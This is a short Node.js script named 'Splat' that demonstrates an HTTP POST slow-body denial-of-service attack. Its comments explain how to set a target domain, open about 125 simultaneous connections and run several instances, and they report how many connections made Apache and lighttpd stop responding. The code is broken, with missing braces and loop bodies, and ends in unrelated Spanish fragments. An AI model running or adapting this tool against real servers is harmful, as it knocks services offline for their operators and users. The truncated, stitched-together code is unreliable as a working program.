//Splat is intended to be a demonstration of the HTTP POST Denial of Service attack described on http://www.acunetix.com/blog/web-security-zone/articles/http-post-denial-service/.
//This script is not meant for nefarious purposes but rather to educate and for testing.
//It is intended to demonstrate how opening lots of simultaneous POST connections to a server, specifying a long Content-Length, and feeding data to the server slowly can cause a mis-configured server to be made unresponsive.
//There's no license on this thing. The author takes no freaking responsibility for what dumbasses decide to do with what is a very basic script that took the author a few minutes to write. Use at your own risk, don't bother the author about it, feel free to fork it, pork it, or whatever you want.
//1) Customize the "url" variable to a domain. DO NOT USE http:// or https://
//2) Set "max_connections" to how many simultaneous connections you want to open. 125 is recommended or Node might freak out.
//3) Set "length" to the total number of bytes that should be sent over time. Each byte is sent once per second.
//4) Run it from your terminal in the node-splat directory, "node app.js"
//5) If you don't know what Node.js is, go to http://nodejs.org
//Running more than 125 max_connections tended to make node.js on the dev system crash. You may be able to do more. Run multiple instances (separate terminal windows on a Mac) to achieve the desired effect.
//On the test system (Mac Pro), Apache on localhost stopped responding with 250 connections. The author's website running on lighttpd handled up to about 1125 simultaneous connections before hanging.
var http = require('http');
//This is the domain to connect to.
var url = 'ejemplo.com';
var max_connections = 125, //This is the number of simultaneous connections to open.
length = 1000000; //The total content length to send.
var params = {
'host': url,
'Content-Length': length
//create a number of connections for the url
var connections = [];
for(var i=0; i<max_connections; i++){
var obj = {}
obj.cnx = http.createClient(80, url);
obj.req = obj.cnx.request('post','/aaa/', params);
var next = function(cnt){
for(var i=0; i<max_connections; i++){
var x = setTimeout(function(){
}, 1000);
if( cnt > length ){
for(var i=0; i<max_connections; i++){
Instalar nodejs en ubuntu 14
Fuente: http://www.acunetix.com/blog/articles/http-post-denial-service/
Ave que vuela, a la cazuela.